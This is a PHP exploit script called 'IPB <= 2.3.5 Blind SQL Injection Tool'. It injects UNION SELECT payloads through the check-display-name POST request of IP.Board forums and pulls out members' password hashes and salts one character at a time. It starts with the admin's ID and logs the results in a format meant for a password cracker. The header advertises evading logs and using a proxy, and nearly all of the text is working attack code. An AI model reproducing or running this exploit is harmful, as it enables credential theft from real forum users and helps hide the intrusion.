Default IP.Board <= 2.3.5 Blind SQL Injection Tool [PHP]

1. <?php
2. error_reporting(E_ALL);
3. ///////////////////////////////////////////////////////////////////////
4. ///////////////////////////////////////////////////////////////////////
5. // IPB <= 2.3.5 sql injection exploit
6. // Version 1.3
7. // written by Wareaxe
8. // Modded by Affix
9. // http://Root-The.NET
10. // based on DarkFig's advisory
11. // http://acid-root.new.fr/?0:18
12. //
13. // FEATURES:
14. // 1. Fetching algorithm optimized for speed
15. // 2. Attack goes through $_POST, so no suspicious logs
16. // 3. Command Line Argument Interface
17. // 4. Select from and to User IDs
18. // 5. Pretesting saves time if IPB is not vulnerable
19. // 6. curl extension autoloading
20. // 7. can work with multiple ID-s
21. // 8. log format compatible with passwordspro
22. ///////////////////////////////////////////////////////////////////////
23. //================================================== ===================
24.  
25. print("RTN IPB <= 2.3.5 Blind SQL Injection Tool \n");
26. print("Coded by Waraxe Modded by Affix \n");
27.  
28. if(!isset($_SERVER['argv'][1]))
29. {
30. die("\n\nUsage php -f " . $_SERVER['argv'][0] . " http://site.com/ <start> <end> <prefix>\n\n");
31. }
32. $url = $_SERVER['argv'][1];
33. if(!isset($_SERVER['argv'][2]))
34. {
35. print("Start and End ID Not Set using 1 and 10 as DEFAULT");
36. $id_start = 1;// starting user ID, default value "1" is admin's ID
37. if(!isset($_SERVER['argv'][3])){
38. $id_end = $id_start + 10;// ending user ID
39. }
40. }
41. else
42. {
43. $id_start = $_SERVER['argv'][2];
44. $id_end = $_SERVER['argv'][3];
45. }
46.  
47. if(!isset($_SERVER['argv'][4]))
48. {
49. print("Prefix not set reverting to default (ibf_)\n");
50. $prefix = 'ibf_';// IPB table prefix, default is "ibf_"
51. }
52. else
53. {
54. $prefix = $_SERVER['argv'][4];
55. }
56.  
57. # Proxy settings
58. # Be sure to use proxy
59. //$proxy_ip_port = '127.0.0.1:8118';
60. //$proxy_user_password = 'someuseromepassword';
61. $outfile = './ipblog.txt';// Log file
62. //================================================== ====================
63. ///////////////////////////////////////////////////////////////////////
64. // Don't mess below this line, unless you know the stuff
65. ///////////////////////////////////////////////////////////////////////
66. //================================================== ===================
67. ///////////////////////////////////////////////////////////////////////
68.  
69. //================================================== ===================
70. $cli = php_sapi_name() === 'cli';
71. //================================================== ===================
72. // Warning, if executed from webserver
73. //================================================== ===================
74. if(!$cli)
75. {
76. if(!isset($_REQUEST['wtf-is-cli']))
77. {
78. echo "<html><head><title>Attention!</title></head>\n";
79. echo "<body><br /><br /><center>\n";
80. echo "<h1>Warning!</h1>\n";
81. echo "This exploit is meant to be used as php CLI script!<br />\n";
82. echo "More information:<br />\n";
83. echo "<a href=\"http://www.google.com/search?hl=en&q=php+cli+windows\" target=\"_blank\">http://www.google.com/search?hl=en&q=php+cli+windows</a><br />\n";
84. echo "Still, you can try to run it from webserver.<br />\n";
85. echo "Just press the button below and prepare for long waiting<br />\n";
86. echo "And learn to use php CLI next time, please ...<br />\n";
87. echo "<form method=\"get\">\n";
88. echo "<input type=\"submit\" name=\"wtf-is-cli\" value=\"Let me in, i don't care\">\n";
89. echo "</form>\n";
90. echo "</center></body></html>\n";
91. exit;
92. }
93. else
94. {
95. // Let's try to maximize our chances without CLI
96. @set_time_limit(0);
97. }
98. }
99. //================================================== ===================
100. xecho("Target: $url\n");
101. xecho("Sql table prefix: $prefix\n");
102. xecho("Testing target URL ... \n");
103. test_target_url();
104. xecho("Target URL seems to be valid\n");
105. add_line("Target: $url");
106.  
107. for($i = $id_start; $i <= $id_end; $i ++)
108. {
109. echo "Testing ID $i\n";
110. if(!test_target_id($i))
111. {
112. echo "ID $i not valid, passing ...\n";
113. continue;
114. }
115. echo "ID $i validated\n";
116.  
117. $hash = get_hash($i);
118. $salt = get_salt($i);
119. $line = "$i:$hash:$salt";
120. add_line($line);
121.  
122. xecho("\n------------------------------------------\n");
123. xecho("User ID: $i\n");
124. xecho("Hash: $hash\n");
125. xecho("Salt: $salt");
126. xecho("\n------------------------------------------\n");
127. }
128.  
129. add_line("------------------------------------------");
130.  
131. xecho("\nQuestions and feedback - http://www.waraxe.us/ ~ http://belegit.org \n");
132. die("See ya!  \n");
133. //////////////////////////////////////////////////////////////////////
134. //////////////////////////////////////////////////////////////////////
135. function test_target_url()
136. {
137. global $url;
138.  
139. $post = 'act=xmlout&do=check-display-name&name=somethingfoobarkind%2527 OR 1=1-- ';
140. $buff = trim(make_post($url, $post, '', $url));
141.  
142. if($buff === 'notfound')
143. {
144. die("Target is patched? Exiting ...\n");
145. }
146.  
147. if($buff !== 'found')
148. {
149. print("Invalid response, target URL not valid? Exiting ... \n\n");
150. die();
151. }
152. }
153. //////////////////////////////////////////////////////////////////////
154. function test_target_id($id)
155. {
156. global $url, $prefix;
157.  
158. $post = 'UNION SELECT 1,1 FROM ' . $prefix . 'members_converge WHERE converge_id=' . $id . ' AND LENGTH(converge_pass_hash)=32';
159.  
160. return test_condition($post);
161. }
162. ///////////////////////////////////////////////////////////////////////
163. function get_salt($id)
164. {
165. $len = 5;
166. $out = '';
167.  
168. xecho("Finding salt ...\n");
169.  
170. for($i = 1; $i < $len + 1; $i ++)
171. {
172. $ch = get_saltchar($i, $id);
173. xecho("Got pos $i --> $ch\n");
174. $out .= "$ch";
175. xecho("Current salt: $out \n");
176. }
177.  
178. xecho("\nFinal salt for ID $id: $out\n\n");
179.  
180. return $out;
181. }
182. ///////////////////////////////////////////////////////////////////////
183. function get_saltchar($pos, $id)
184. {
185. global $prefix;
186.  
187. $char = '';
188. $min = 32;
189. $max = 128;
190. $pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_salt,$pos,1))";
191. $curr = 0;
192.  
193. while(1)
194. {
195. $area = $max - $min;
196. if($area < 2 )
197. {
198. $post = $pattern . "=$max";
199. $eq = test_condition($post);
200.  
201. if($eq)
202. {
203. $char = chr($max);
204. }
205. else
206. {
207. $char = chr($min);
208. }
209.  
210. break;
211. }
212.  
213. $half = intval(floor($area / 2));
214. $curr = $min + $half;
215.  
216. $post = $pattern . '%253e' . $curr;
217.  
218. $bigger = test_condition($post);
219.  
220. if($bigger)
221. {
222. $min = $curr;
223. }
224. else
225. {
226. $max = $curr;
227. }
228.  
229. xecho("Current test: $curr-$max-$min\n");
230. }
231.  
232. return $char;
233. }
234. ///////////////////////////////////////////////////////////////////////
235. function get_hash($id)
236. {
237. $len = 32;
238. $out = '';
239.  
240. xecho("Finding hash ...\n");
241.  
242. for($i = 1; $i < $len + 1; $i ++)
243. {
244. $ch = get_hashchar($i, $id);
245. xecho("Got pos $i --> $ch\n");
246. $out .= "$ch";
247. xecho("Current hash: $out \n");
248. }
249.  
250. xecho("\nFinal hash for ID $id: $out\n\n");
251.  
252. return $out;
253. }
254. ///////////////////////////////////////////////////////////////////////
255. function get_hashchar($pos, $id)
256. {
257. global $prefix;
258.  
259. $char = '';
260. $pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_hash,$pos,1))";
261.  
262. // First let's determine, if it's number or letter
263. $post = $pattern . '%253e57';
264. $letter = test_condition($post);
265.  
266. if($letter)
267. {
268. $min = 97;
269. $max = 102;
270. xecho("Char to find is [a-f]\n");
271. }
272. else
273. {
274. $min = 48;
275. $max = 57;
276. xecho("Char to find is [0-9]\n");
277. }
278.  
279. $curr = 0;
280.  
281. while(1)
282. {
283. $area = $max - $min;
284. if($area < 2 )
285. {
286. $post = $pattern . "=$max";
287. $eq = test_condition($post);
288.  
289. if($eq)
290. {
291. $char = chr($max);
292. }
293. else
294. {
295. $char = chr($min);
296. }
297.  
298. break;
299. }
300.  
301. $half = intval(floor($area / 2));
302. $curr = $min + $half;
303.  
304. $post = $pattern . '%253e' . $curr;
305.  
306. $bigger = test_condition($post);
307.  
308. if($bigger)
309. {
310. $min = $curr;
311. }
312. else
313. {
314. $max = $curr;
315. }
316.  
317. xecho("Current test: $curr-$max-$min\n");
318. }
319.  
320. return $char;
321. }
322. ///////////////////////////////////////////////////////////////////////
323. function test_condition($p)
324. {
325. global $url;
326.  
327. $bret = false;
328. $maxtry = 10;
329. $try = 1;
330.  
331. $pattern = 'act=xmlout&do=check-display-name&name=%%2527 OR 1=%%2522%%2527%%2522 %s OR 1=%%2522%%2527%%2522-- ';
332. $post = sprintf($pattern, $p);
333.  
334. while(1)
335. {
336. $buff = trim(make_post($url, $post, '', $url));
337.  
338. if($buff === 'found')
339. {
340. $bret = true;
341. break;
342. }
343. elseif($buff === 'notfound')
344. {
345. break;
346. }
347. elseif(strpos($buff, '<title>IPS Driver Error</title>') !== false)
348. {
349. die("Sql error! Wrong prefix?\nExiting ... ");
350. }
351. else
352. {
353. xecho("test_condition() - try $try - invalid return value ...\n");
354. $try ++;
355. if($try > $maxtry)
356. {
357. die("Too many tries - exiting ...\n");
358. }
359. else
360. {
361. xecho("Trying again - try $try ...\n");
362. }
363. }
364. }
365.  
366. return $bret;
367. }
368. ///////////////////////////////////////////////////////////////////////
369. function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
370. {
371. $ch = curl_init();
372. $timeout = 120;
373. curl_setopt ($ch, CURLOPT_URL, $url);
374. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
375. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
376. curl_setopt($ch, CURLOPT_POST, 1);
377. curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
378. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
379. curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1');
380.  
381. if(!empty($GLOBALS['proxy_ip_port']))
382. {
383. curl_setopt($ch, CURLOPT_PROXY, $GLOBALS['proxy_ip_port']);
384.  
385. if(!empty($GLOBALS['proxy_user_password']))
386. {
387. curl_setopt($ch, CURLOPT_PROXYUSERPWD, $GLOBALS['proxy_user_password']);
388. }
389. }
390.  
391. if(!empty($cookie))
392. {
393. curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
394. }
395.  
396. if(!empty($referer))
397. {
398. curl_setopt ($ch, CURLOPT_REFERER, $referer);
399. }
400.  
401. if($headers === TRUE)
402. {
403. curl_setopt ($ch, CURLOPT_HEADER, TRUE);
404. }
405. else
406. {
407. curl_setopt ($ch, CURLOPT_HEADER, FALSE);
408. }
409.  
410. $fc = curl_exec($ch);
411. curl_close($ch);
412.  
413. return $fc;
414. }
415. ///////////////////////////////////////////////////////////////////////
416. function add_line($line)
417. {
418. global $outfile;
419.  
420. $line .= "\n";
421. $fh = fopen($outfile, 'ab');
422. fwrite($fh, $line);
423. fclose($fh);
424.  
425. }
426. ///////////////////////////////////////////////////////////////////////
427. function xecho($line)
428. {
429. if($GLOBALS['cli'])
430. {
431. echo "$line";
432. }
433. else
434. {
435. $line = nl2br(htmlspecialchars($line));
436. echo "$line";
437. }
438. }
439. //////////////////////////////////////////////////////////////////////
440. ?>